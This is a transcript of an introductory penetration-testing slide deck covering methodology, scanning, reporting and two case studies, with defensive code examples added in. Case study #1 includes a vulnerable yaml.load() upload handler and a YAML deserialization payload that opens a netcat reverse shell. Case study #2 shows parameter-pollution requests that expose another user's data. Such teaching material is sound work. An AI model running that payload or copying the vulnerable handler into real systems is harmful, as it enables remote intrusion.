
Pentest 101 @ Mahanakorn Network Research Laboratory

Free event from Mahanakorn University of Technology (MUT)

Published on June 19, 2017

Published in: Technology


  1. Pentest 101 | Version: 1.0 | Date: 2017-06-17 | Author: P. Morimoto | Responsible: P. Morimoto | Confidentiality Class: Public
  2. © 2013 SEC Consult Unternehmensberatung GmbH, all rights reserved | Title: Pentest 101 | Responsible: P. Morimoto | Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public
     SEC Consult – Who we are
     • Founded in 2002
     • 70+ Security Experts
     • 400+ Security Audits per year
     • Globally operating
     • SEC Consult Vulnerability Lab
     SEC Consult offices and clients (map): Vienna (HQ) | AT, Wiener Neustadt | AT, Linz | AT, Vilnius | LT, Berlin | DE, Montreal | CA, Singapore | SG, Moscow | RU, Zurich | CH, Bangkok | TH, Malaysia | MY, Luxembourg | LU
  3. SEC Consult – Who we are
     • Advisor for information security
     • Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB)
     • Leading company for technical security audits
     • Specialist for web application security according to ONR 17700
     • Independent of product manufacturers
     • Our customers are public authorities, financial institutions and insurance companies in Central Europe
     • Sectoral orientation (defence, public, finance, industry)
  4. ISO/IEC 27001 Certificate: entire company within certification scope, certified since 16.01.2008
  5. SEC Consult Vulnerability Lab
     • European leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories)
     • Integral part of the education and the further training of the security experts at SEC Consult
     • Early information of our customers due to SEC Consult security alerts
     • Support of well-known manufacturers to enhance the security of their products
     Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html
  6. Who am I? (Professional)
     Pichaya Morimoto, IT Security Consultant
     Certifications:
     • Offensive Security Certified Professional (OSCP)
     • GIAC Web Application Penetration Tester (GWAPT)
     • Certified Ethical Hacker (CEH)
     • CompTIA Security+
     Published Security Advisories:
     • 2014: Privilege Escalation in Snort pfSense Package; Wordpress TimThumb 2.8.13 WebShot RCE; HybridAuth install.php PHP RCE
     • 2015: PHP MoAdmin 1.1.2 RCE; Schedule Facebook Posts 1.5.6 SQL Injection; Lime Survey Multiple Critical Vulnerabilities
     • 2016: Yeager CMS Multiple Critical Vulnerabilities; ASUS DSL-N55U router Multiple Vulnerabilities; LINE platform Multiple Vulnerabilities
     • 2017: Aruba AirWave 8.2.3 External Entity Injection
  7. Who am I? (Personal)
     • Co-administrator of สอนแฮกเว็บแบบแมว ๆ
     • *Former* CTF player of Pwnladin Team
     • Co-administrator of 2600 Thailand
     • Security addict
     http://thehackernews.com/2014/06/zero-day-timthumb-webshot-vulnerability.html
  8. Who am I? (Personal)
     • OWASP Thailand Meeting 3/2014, topic: SQL Injection 101: It is not just about ' or '1'='1
     • OWASP Thailand Meeting 5/2015, topic: SQLi + Secure Coding with Hands-on
     • OWASP Thailand Meeting 7/2016, topic: Security Misconfiguration
     • OWASP Thailand Meeting 2/2017, topic: OWASP Top Ten Proactive Controls 2016
     …
  9. Who am I? (Personal)
     • Bug bounty hunter
     • Occasionally, kill bugs for free
     Metasploit modules:
     • exploit/multi/http/phpmoadmin_exec
     • exploit/unix/webapp/hybridauth_install_php_exec
     • auxiliary/admin/http/limesurvey_file_download
     and a lot more private exploit research and developments : )
  10. Who am I? (Personal)
     Special Contributor in LINE Security Bug Bounty Program
     • https://bugbounty.linecorp.com/en/halloffame/ (2017)
     • https://bugbounty.linecorp.com/en/halloffame/2016/ (2016)
  11. Today’s Objective
     1. Introduction to Penetration Testing
        • What is Penetration Testing?
        • Importance of Penetration Testing
        • Risk, Vulnerability and Exploit
     2. Understand the difference between types of security testing
        • Vulnerability Assessment (VA)
        • Penetration Testing
        • Blackbox, whitebox and greybox
     3. A quick glance at Penetration Testing methodologies
        • Public guidelines
        • Major activities in Penetration Testing phases: pre-engagement, engagement, post-engagement
     4. Basic steps for attacking a target system
        • Case studies
  12. Notice
     The information provided in this presentation is collected from publicly available websites and online documents. SEC Consult has an improved version of these methodologies, but it cannot be presented here due to the confidentiality of our business.
  13. What is Penetration Testing? (also called Pentest)
     Penetration Testing: “an authorized simulated attack on a computer system that looks for security weaknesses, potentially gaining access to the system's features and data.” (https://en.wikipedia.org/wiki/Penetration_test)
     Goal: to increase the security of the system (network, application) being tested.
  14. Attack on a Computer System!
     Gain access to restricted resources
     • Unauthorized access to restricted data
     • Cross-tenant data access between users
     • From application user to administrator
     • From application user to local OS user/administrator
     • Break into hosts in an internal network
     Identify security misconfigurations and insecure implementation
     • Insecure configuration of system services and applications
     • Bypass security constraints (login, OTP, access control, payment etc.)
     • Missing security patches
     Privacy
     You need to think like the bad guys.
  15. OWASP Top 10 (WebApp) (Release Candidate)
     https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
  16. Pentest a Website: The Outcome
     Sample list of vulnerabilities:
     • SQL injection
     • Broken access control
     • Bypass OTP verification
     • User denial of service
     • Improper use of encryption
     • Stored cross-site scripting
     • XML external entity injection
     • Upload of arbitrary files
     • Remote code execution
  17. Vulnerability in Standard Software
     http://www.securityweek.com/aruba-patches-vulnerabilities-airwave-product
     • Found during an internal audit
     • Managed to read credentials of all APs
     • Notified the vendor to fix the security flaw
     • Helps protect thousands of users from cyber attacks
  18. Risk, Vulnerability and Exploit
     Risk (see https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology)
     Vulnerability
     • SQL injection, cross-site scripting …
     • Missing function level access control
     • Insufficient network segmentation
     Exploit: an attempt to verify the risk by attacking the identified vulnerability
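A worked rating along the OWASP Risk Rating Methodology the slide points to, as an added example that is not part of the talk: the eight likelihood factors and the impact factors are averaged into 0-9 bands and combined through the methodology's severity matrix. The factor scores for the SQL injection case are constructed for illustration.

```python
"""OWASP Risk Rating Methodology: rate a finding from its likelihood and impact factors."""
from statistics import mean

# Factor names follow the OWASP Risk Rating Methodology; every factor is scored 0-9.
THREAT_AGENT = ("skill_level", "motive", "opportunity", "size")
VULNERABILITY = ("ease_of_discovery", "ease_of_exploit", "awareness", "intrusion_detection")
TECHNICAL_IMPACT = ("loss_of_confidentiality", "loss_of_integrity",
                    "loss_of_availability", "loss_of_accountability")
BUSINESS_IMPACT = ("financial_damage", "reputation_damage", "non_compliance", "privacy_violation")

# Overall severity matrix of the methodology: (likelihood level, impact level) -> severity.
SEVERITY = {
    ("LOW", "LOW"): "Note",      ("MEDIUM", "LOW"): "Low",       ("HIGH", "LOW"): "Medium",
    ("LOW", "MEDIUM"): "Low",    ("MEDIUM", "MEDIUM"): "Medium", ("HIGH", "MEDIUM"): "High",
    ("LOW", "HIGH"): "Medium",   ("MEDIUM", "HIGH"): "High",     ("HIGH", "HIGH"): "Critical",
}


def average_factors(scores, names):
    """Average the named factors; refuse missing factors or scores outside 0-9."""
    missing = [n for n in names if n not in scores]
    if missing:
        raise ValueError(f"missing factor scores: {missing}")
    for n in names:
        if not 0 <= scores[n] <= 9:
            raise ValueError(f"factor {n} must be scored 0-9, got {scores[n]}")
    return mean(scores[n] for n in names)


def level(score):
    """Map a 0-9 average to the methodology's three bands."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def rate_risk(likelihood_scores, impact_scores):
    """Return likelihood, technical and business impact, and the overall severity.

    As the methodology recommends, the business impact decides the overall severity
    when all four business factors are scored; otherwise the technical impact is used.
    """
    likelihood = average_factors(likelihood_scores, THREAT_AGENT + VULNERABILITY)
    technical = average_factors(impact_scores, TECHNICAL_IMPACT)
    business = None
    if all(n in impact_scores for n in BUSINESS_IMPACT):
        business = average_factors(impact_scores, BUSINESS_IMPACT)
    impact = business if business is not None else technical
    return {
        "likelihood": likelihood,
        "likelihood_level": level(likelihood),
        "technical_impact": technical,
        "business_impact": business,
        "impact_level": level(impact),
        "severity": SEVERITY[(level(likelihood), level(impact))],
    }


# Constructed scoring of an unauthenticated SQL injection in an internet-facing web
# application, for illustration only (not a finding from the talk).
SQLI_LIKELIHOOD = {
    "skill_level": 3, "motive": 4, "opportunity": 9, "size": 9,
    "ease_of_discovery": 7, "ease_of_exploit": 5, "awareness": 9, "intrusion_detection": 8,
}
SQLI_IMPACT = {
    "loss_of_confidentiality": 7, "loss_of_integrity": 7,
    "loss_of_availability": 5, "loss_of_accountability": 7,
    "financial_damage": 7, "reputation_damage": 5, "non_compliance": 7, "privacy_violation": 7,
}

if __name__ == "__main__":
    result = rate_risk(SQLI_LIKELIHOOD, SQLI_IMPACT)
    print(f"likelihood {result['likelihood']:.2f} ({result['likelihood_level']}), "
          f"impact {result['impact_level']}: severity {result['severity']}")
```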
  19. Sample Exploit Code (screenshots: EternalBlue exploit; Blind SQL injection exploit)
  20. Importance of Penetration Testing
     • Identify vulnerabilities and security misconfigurations
     • Measure the effectiveness of the existing security controls
     • Identify gaps in compliance (ISO 27001, PCI DSS etc.)
     • A requirement from customer, partner or company’s HQ
     PCI DSS v3.2, Requirement 11.3:
     • Requirement 11.3.1: Conduct external penetration testing at least annually or after any significant change has occurred in the organization’s environment
     • Requirement 11.3.2: Conduct internal penetration testing at least annually or after any significant change has occurred in the organization’s environment
     • Requirement 11.3.3: Exploitable vulnerabilities identified during testing shall be corrected and testing shall be repeated to verify corrections
     • Requirement 11.3.4: Perform network segmentation testing to validate if segmentation controls and methods are effective and operational
  21. Who should conduct a Pentest for your system?
     Someone within the company that uses the system
     • IT support, network / system engineer
     • Programmer, software tester
     Hire an IT security specialist into the company
     • Security engineer
     • Penetration tester
     External security consultant firms
     • Penetration tester
     • SEC Consult (。◕‿◕。)
     PCI DSS Penetration Testing Guidance: Qualified internal resources or a qualified third party may perform the penetration test as long as they are organizationally independent. This means the penetration tester must be organizationally separate from the management of the target systems.
  22. My Experience on Security Certificates
  23. Checkpoint #1
     ✓ What is Penetration Testing? (also called Pentest)
     ✓ Attack on a Computer System!
     ✓ OWASP Top 10 (WebApp)
     ✓ Pentest a Website: The Outcome
     ✓ Vulnerability in Standard Software
     ✓ Risk, Vulnerability and Exploit
     ✓ Sample Exploit Code
     ✓ Importance of Penetration Testing
     ✓ Who should conduct a Pentest for your system?
     ✓ My Experience on Security Certificates
  24. I want a Pentest (https://twitter.com/coffeetocode/status/794593057282859008)
  25. Vulnerability Assessment (VA)
     Network VA scanners
     • Nexpose
     • Nessus
     • Qualys
     WebApp VA scanners
     • Acunetix
     • IBM AppScan
     • HP WebInspect
  26. Types of Penetration Testing
     Blackbox Pentest
     • IP in the scope
     Greybox Pentest
     • App user, VPN user
     • User manual
     Whitebox Pentest
     • Source code
     • SSH and/or RDP access
     • Network diagram
     • Detailed documents
  27. Blackbox Pentest in Action: Hack Me Please.
  28. Methodologies and Standards
     • OWASP Testing Guide ***
     • Open Source Security Testing Methodology Manual (OSSTMM)
     • Penetration Testing Execution Standard (PTES)
     • PCI DSS Penetration Testing Guidance ***
     • NIST Guideline on Network Security Testing (Special Publication 800-42)
     • NIST SP 800-115: Technical Guide to Information Security Testing and Assessment
     • OWASP Top Ten (Web App / Mobile App) ***
     • CWE/SANS Top 25 Most Dangerous Software Errors ***
     • Durchfuehrungskonzept fuer Penetrationstests (BSI, Germany)
     • ÖNORM A 7700 (standard for web application security in Austria)
  29. Checkpoint #2
     ✓ I want a Pentest
     ✓ Vulnerability Assessment (VA)
     ✓ Types of Penetration Testing
     ✓ Blackbox Pentest in Action
     ✓ Methodologies and Standards
  30. Activities in a Penetration Testing Project
     1) Pre-engagement
        • Schedule
        • Scoping
        • Rules of engagement
        • Formal permission
        • Contract points
     2) Engagement
        • Penetration Testing
     3) Post-engagement
        • Reporting
        • Remediation
        • Retesting identified vulnerabilities
        • Cleaning up the Environment
  31. Pre-engagement: The Boring Stuff
     Scoping
     • Success criteria
     • Target systems
     • Documentation
     • User credentials
     • Network diagram
     • Formal permission to attack
     • Identified vulnerabilities in the past
     Rules of engagement
     • Schedule, time window
     • Method of communication
     • Contact points
     • Disable IPS, WAF?
     • How to handle sensitive data?
     • Systems that may have issues with security scanners?
     • List of all IP addresses from which testing will originate?
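An added example, not from the talk, of what two of the rules-of-engagement items above (the agreed time window and the list of source IP addresses testing will originate from) give the defending side: the SOC can label firewall events as authorized test traffic, tester activity outside the window, or something that needs a real look. The ROE values, the key=value log format and the log lines are all constructed.

```python
"""Triage firewall events during a pentest against the agreed rules of engagement."""
import ipaddress
import re
from datetime import datetime

# Rules of engagement agreed in pre-engagement (constructed values): the tester's
# source addresses and the agreed testing window, both in UTC.
ROE = {
    "tester_sources": ["203.0.113.0/29"],
    "window_start": datetime(2017, 6, 19, 9, 0),
    "window_end": datetime(2017, 6, 19, 18, 0),
}

# Constructed firewall log lines in a simple key=value format (not real logs).
SAMPLE_LOG = """\
2017-06-19T10:15:02Z src=203.0.113.2 dst=192.168.99.101 dport=443 proto=tcp action=allow
2017-06-19T10:15:03Z src=203.0.113.2 dst=192.168.99.101 dport=8080 proto=tcp action=deny
2017-06-19T11:40:11Z src=198.51.100.77 dst=192.168.99.101 dport=22 proto=tcp action=deny
2017-06-19T22:05:40Z src=203.0.113.3 dst=192.168.99.101 dport=3389 proto=tcp action=deny
garbage line that does not parse
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+) action=(?P<action>\w+)$"
)


def parse_line(line):
    """Return a dict for one log line, or None when the line does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%S")
    event["dport"] = int(event["dport"])
    return event


def classify(event, roe=ROE):
    """Label an event 'authorized_test', 'tester_outside_window' or 'unexpected'."""
    src = ipaddress.ip_address(event["src"])
    from_tester = any(src in ipaddress.ip_network(n) for n in roe["tester_sources"])
    in_window = roe["window_start"] <= event["ts"] <= roe["window_end"]
    if from_tester and in_window:
        return "authorized_test"
    if from_tester:
        return "tester_outside_window"
    return "unexpected"


def triage(log_text, roe=ROE):
    """Classify every parseable line; returns (labelled events, count of unparseable lines)."""
    labelled, skipped = [], 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        if event is None:
            skipped += 1
            continue
        labelled.append((event["ts"].isoformat(), event["src"], classify(event, roe)))
    return labelled, skipped


if __name__ == "__main__":
    events, bad = triage(SAMPLE_LOG)
    for ts, src, label in events:
        print(f"{ts} {src:15} {label}")
    print(f"{bad} unparseable line(s)")
```

Events labelled "unexpected" are the ones the SOC still has to treat as potential real attacks; "tester_outside_window" is a rules-of-engagement breach to raise with the contact points agreed in pre-engagement.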
  32. Engagement: The Five Phases of Hacking
     1. Reconnaissance
        • Passive info. gathering
     2. Scanning
        • Active info. gathering
        • Host discovery
        • Port scan
        • VA scan
     3. Gaining Access
        • Exploit the vulnerability
     4. Maintaining Access
     5. Covering Tracks
  33. Engagement: Reconnaissance (Passive)
     Passive information gathering:
     • The information obtained from the customer
     • Open source intelligence (OSINT)
     • Company websites
     • Search engine (Google, Bing)
     • Social media (Facebook, Twitter, LinkedIn)
     • Qualification in recruitment sites (jobsdb)
     • Software vendor
     • Web footer, HTML comments, credit in CSS/JS files
     • Metadata from publicly available files (DOC, XLT, PDF, JPG)
     • Email, email headers
     • Physical locations, list of employees
     • The customer in news
  34. Engagement: Reconnaissance (Passive)
  35. Engagement: Reconnaissance (Passive)
  36. Engagement: Scanning (Active)
     Automated tools or manual:
     • Interact with the system
     • Host discovery (nmap)
     • Port scan (nmap)
     • Network sniffing (Wireshark)
     • Social engineering (phone call, phishing email)
     • Vulnerability scan (Nessus, Nexpose)
     On-site information gathering:
     • Physical security inspections
     • Wireless scanning
     • Accessible facilities
     • Dumpster diving
     • Types of equipment in use
  37. Engagement: Scanning (Active)
     $ sudo nmap 192.168.99.101
     $ sudo nmap -Pn -n -p 1-65535 192.168.99.101 --open -sV -O
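An added example, not from the talk, that turns the XML nmap writes with `-oX` for the second command above into the open-port inventory the later "check all the open ports, UDP/TCP" step works through and the report lists under Tools Used / Findings. The nmap XML below is constructed to mirror nmap's real element layout (host, address, ports/port, state, service, os/osmatch), and `parse_nmap_xml` and `open_port_checklist` are this example's own helpers.

```python
"""Turn nmap -oX output into the per-port checklist used during exploitation and reporting."""
import xml.etree.ElementTree as ET

# Constructed nmap XML for the host scanned in the talk, trimmed to the elements used below.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -n -p 1-65535 --open -sV -O 192.168.99.101" version="7.40">
<host><status state="up" reason="user-set"/>
<address addr="192.168.99.101" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
<service name="ssh" product="OpenSSH" version="7.4p1" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.4.25" method="probed" conf="10"/></port>
<port protocol="tcp" portid="3306"><state state="filtered" reason="no-response"/>
<service name="mysql" method="table" conf="3"/></port>
<port protocol="udp" portid="161"><state state="open" reason="udp-response"/>
<service name="snmp" method="table" conf="3"/></port>
</ports>
<os><osmatch name="Linux 3.2 - 4.9" accuracy="95"/></os>
</host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per scanned host with its address, best OS guess and all ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        os_match = host.find("os/osmatch")
        ports = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            service = port.find("service")
            # Product and version are only present when -sV could fingerprint the service.
            product = ""
            if service is not None:
                product = (service.get("product", "") + " " + service.get("version", "")).strip()
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else "unknown",
                "service": service.get("name", "") if service is not None else "",
                "product": product,
            })
        hosts.append({
            "addr": addr.get("addr") if addr is not None else "",
            "os": os_match.get("name") if os_match is not None else "",
            "ports": ports,
        })
    return hosts


def open_port_checklist(hosts):
    """List every open port, TCP and UDP alike, as (addr, proto, port, service, product)
    tuples; filtered and closed ports are left out and the result is sorted so the
    checklist is deterministic."""
    rows = [
        (h["addr"], p["proto"], p["port"], p["service"], p["product"])
        for h in hosts for p in h["ports"] if p["state"] == "open"
    ]
    return sorted(rows)


if __name__ == "__main__":
    for row in open_port_checklist(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print("%-15s %s/%-5d %-8s %s" % row)
```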
  38. 38. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 38 Engagement: Scanning (Active)
  39. 39. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 39 Engagement: Scanning (Active)
  40. 40. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 40 Checkpoint #3 ü Activities in a Penetration Testing Project ü Pre-engagement: The Boring Stuff ü Engagement: The Five Phases of Hacking ü Engagement: Reconnaissance (Passive) ü Google ü Shodan ü Engagement: Scanning (Active) ü Nmap ü Nessus [… To be continued…] • Engagement: Gaining Access • Post-engagement: …
  41. 41. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 41 Engagement: Gaining Access (Sample Vulnerabilities) Attack application layer Attack network layer • SQL injection • Insecure data storage • Broken authentication • Broken session management • Lack of network segmentation • Missing ARP spoofing detection • Missing SYN flood attack detection • Weak wireless encryption
  42. 42. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 42 Engagement: Exploitation Check all the open ports - UDP/TCP
  43. 43. © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: [--Title--] | Responsible: [--Responsible--] Version / Date: [--VX.X / YYYY-MM-DD--] | Confidentiality Class: [--Confidentiality Class--] © 2013 SEC Consult Unternehmensberatung GmbH All rights reserved Title: Pentest 101 | Responsible: P. Morimoto Version / Date: 1.0 / 2017-06-17 | Confidentiality Class: Public © 2014 SEC Consult Unternehmensberatung GmbH All rights reserved 43 Engagement: Exploitation (OWASP Testing Guide) Google: ”OWASP Testing Guide”
44. Engagement: Post-exploitation
• Privilege Escalation
• Pivoting
https://www.exploit-db.com/exploits/39719/
45. Post-engagement: The Boring Stuff #2
• Reporting
• Remediation
• Retesting identified vulnerabilities
• Cleaning up the environment
46. Post-engagement: Reporting Guideline (PCI DSS – Penetration Testing Guidance)
• Executive Summary
  • Brief high-level summary of the penetration test scope and major findings
• Statement of Scope
• Statement of Methodology
• Statement of Limitations
• Testing Narrative
  • Document any issues encountered during testing
• Segmentation Test Results
• Findings
  • Risk ranking/severity of each vulnerability
  • Description of each finding
• Tools Used
• Cleaning up the Environment Post-penetration Test
  • Provide directions on how clean-up should be performed
47. Engagement: Case Study #1
48. Engagement: Case Study #1

    from flask import Flask, request, flash, redirect
    import yaml

    app = Flask(__name__)
    app.secret_key = "<set-a-real-secret>"  # flash() needs a session secret; placeholder value

    @app.route('/', methods=['GET', 'POST'])
    def upload_file():
        if request.method == 'POST':
            if 'file' not in request.files:
                flash('No file part')
                return redirect(request.url)
            file = request.files['file']
            raw_content = file.read()
            # Vulnerable as shown on the slide: yaml.load() on user-controlled
            # content honours PyYAML's !!python/... tags and can construct
            # arbitrary Python objects from the uploaded document
            content = yaml.load(raw_content)
            return yaml.dump(content)

Highlighted on the slide: yaml.load()
49. Engagement: Case Study #1
https://stackoverflow.com/questions/1773805/how-can-i-parse-a-yaml-file-in-python
(screenshot of the answer, with two numbered callouts)
50. Engagement: Case Study #1
51. Engagement: Case Study #1
File: Exploit.yml

    some_option: !!python/object/apply:subprocess.call
      args: [nc 192.168.213.170 1234 -e /bin/bash]
      kwds: {shell: true}
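The fix for Case Study #1, as an added example that is not part of the deck: the upload handler's `yaml.load(raw_content)` step replaced by `yaml.safe_load`, which only builds standard YAML types and raises `ConstructorError` on any `!!python/...` tag, plus a size limit and a shape check as defence in depth. The sample documents, the 64 KiB limit and the expected "flat mapping of scalars" shape are assumptions for the example; the tagged document reuses the tag form of Exploit.yml but with a harmless callable.

```python
import yaml

# Constructed sample uploads (not from the slide deck). The second one carries
# the same !!python/object/apply tag as the deck's Exploit.yml but names a
# harmless callable: SafeLoader rejects the tag before anything is resolved.
BENIGN_UPLOAD = b"some_option: value\nretries: 3\n"
TAGGED_UPLOAD = b"some_option: !!python/object/apply:os.getcwd []\n"

MAX_UPLOAD_BYTES = 64 * 1024  # assumed limit for the example; tune per application


def parse_untrusted_yaml(raw_content):
    """Hardened replacement for the `content = yaml.load(raw_content)` step.

    Returns (True, parsed) on success or (False, reason) on rejection.
    yaml.safe_load only constructs standard YAML types (str, int, float,
    bool, None, list, dict); a language-specific tag such as
    !!python/object/apply raises ConstructorError instead of building
    (or calling) anything.
    """
    if len(raw_content) > MAX_UPLOAD_BYTES:
        return False, "TooLarge"
    try:
        parsed = yaml.safe_load(raw_content)
    except yaml.YAMLError as exc:  # ConstructorError, ScannerError, ParserError, ...
        return False, type(exc).__name__
    # Defence in depth: the upload is expected to be a flat mapping of string
    # keys to scalar values, so anything else is rejected before it is used.
    if not isinstance(parsed, dict):
        return False, "NotAMapping"
    for key, value in parsed.items():
        if not isinstance(key, str) or isinstance(value, (dict, list)):
            return False, f"UnexpectedShape:{key!r}"
    return True, parsed


def render_upload(raw_content):
    """What the handler would return: the safely re-serialised document, or a
    short rejection reason (never the raw input echoed back)."""
    ok, result = parse_untrusted_yaml(raw_content)
    return yaml.safe_dump(result) if ok else f"rejected: {result}"


if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_UPLOAD), ("tagged", TAGGED_UPLOAD)):
        print(name, "->", render_upload(doc).strip())
```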
52. Engagement: Case Study #2
Components in the diagram:
• 3rd party Mobile App (Internet)
• 3rd party Dispatcher Server
• 3rd party DB/Auth Server
• Critical Systems (Isolated Network)
53. Engagement: Case Study #2
Mobile App → 3rd party Dispatcher Server (over the Internet):
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>
Dispatcher Server → customer (Critical Systems, Isolated Network):
    POST /userInfo
    Host: customer
    userId=1234
Result: Data for the authorized user (1234)
54. Engagement: Case Study #2
Mobile App → 3rd party Dispatcher Server (over the Internet):
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>&aaa=bbb
Dispatcher Server → customer (Critical Systems, Isolated Network):
    POST /userInfo
    Host: customer
    userId=1234&aaa=bbb
Result: Data for the authorized user (1234)
55. Engagement: Case Study #2
Mobile App → 3rd party Dispatcher Server (over the Internet):
    POST /userInfo
    Host: 3rdparty
    token=<3rdparty-token>&userId=1235
Dispatcher Server → customer (Critical Systems, Isolated Network):
    POST /userInfo
    Host: customer
    userId=1234&userId=1235
Result: Data for the authorized user (1235)
56. Engagement: Case Study #2
https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-INPVAL-004)
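The parameter pollution in Case Study #2 in code, as an added example that is not part of the deck: the dispatcher's concatenation and a last-value-wins backend reproduce "Data for the authorized user (1235)", and a hardened dispatcher and backend refuse client-supplied or repeated `userId` keys. The request bodies are constructed from the slides' diagrams; that the customer backend keeps the last duplicate value is an assumption matching the outcome shown.

```python
from urllib.parse import parse_qs, parse_qsl, urlencode

# Constructed request bodies modelled on the case-study diagrams.
CLEAN_EXTRA = "aaa=bbb"         # slide 54: an unrelated extra parameter
POLLUTED_EXTRA = "userId=1235"  # slide 55: a duplicate of the dispatcher's own key

# Parameters the dispatcher derives from the authenticated token itself;
# a client must never be able to supply them.
SERVER_CONTROLLED = frozenset({"userId"})


def naive_forward(auth_user_id, client_extra):
    """The dispatcher behaviour shown in the deck: the userId resolved from the
    token is concatenated with whatever else the client sent."""
    return f"userId={auth_user_id}&{client_extra}"


def last_wins_lookup(body):
    """A backend that keeps the last value of a repeated key (assumed here, as
    it explains 'Data for the authorized user (1235)'). dict(parse_qsl(...))
    has exactly that property."""
    return dict(parse_qsl(body, keep_blank_values=True))["userId"]


def safe_forward(auth_user_id, client_extra):
    """Hardened dispatcher: parse the client's parameters, refuse any key the
    dispatcher controls or any key sent more than once, then re-encode from a
    dict so the backend receives every key exactly once."""
    client = parse_qs(client_extra, keep_blank_values=True)
    for key, values in client.items():
        if key in SERVER_CONTROLLED:
            raise ValueError(f"client may not set {key}")
        if len(values) != 1:
            raise ValueError(f"parameter {key} repeated {len(values)} times")
    body = {"userId": auth_user_id}
    body.update((k, v[0]) for k, v in client.items())
    return urlencode(body)


def strict_lookup(body):
    """Hardened backend: reject repeated keys instead of silently picking the
    first or last value, so a polluted request fails closed."""
    parsed = parse_qs(body, keep_blank_values=True)
    repeated = sorted(k for k, v in parsed.items() if len(v) > 1)
    if repeated:
        raise ValueError(f"repeated parameters: {repeated}")
    return {k: v[0] for k, v in parsed.items()}
```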
57. How to become a Penetration Tester?
My Path:
- Join security communities in Thailand (2600 Thailand, OWASP Thailand Chapter, TISA, CITEC)
- Practice, practice, and practice!
- Share what you learn!
- Join the hacking competitions and Capture the Flag games
58. How to become a Penetration Tester?
https://goo.gl/8cLyPY
59. Find security consultant firms in Thailand
https://goo.gl/N9DkGM
60. Contact

GERMANY
SEC Consult Unternehmensberatung Deutschland GmbH
Bockenheimer Landstraße 17-19, 60325 Frankfurt / Main
Tel +49 69 175 373 43 | Fax +49 69 175 373 44
Email office-frankfurt@sec-consult.com

AUSTRIA
SEC Consult Unternehmensberatung GmbH
Mooslackengasse 17, 1190 Vienna
Tel +43 1 890 30 43 0 | Fax +43 1 890 30 43 15
Email office@sec-consult.com

AUSTRIA
SEC Consult Unternehmensberatung GmbH
Komarigasse 14/1, 2700 Wiener Neustadt
Tel +43 1 890 30 43 0
Email office@sec-consult.com

LITHUANIA
UAB Critical Security, a SEC Consult company
Sauletekio al. 15-311, 10224 Vilnius
Tel +370 5 2195535
Email office-vilnius@sec-consult.com

RUSSIA
CJCS Security Monitor
5th Donskoy proyezd, 15, Bldg. 6, 119334 Moscow
Tel +7 495 662 1414
Email info@securitymonitor.ru

SINGAPORE
SEC Consult Singapore PTE. LTD
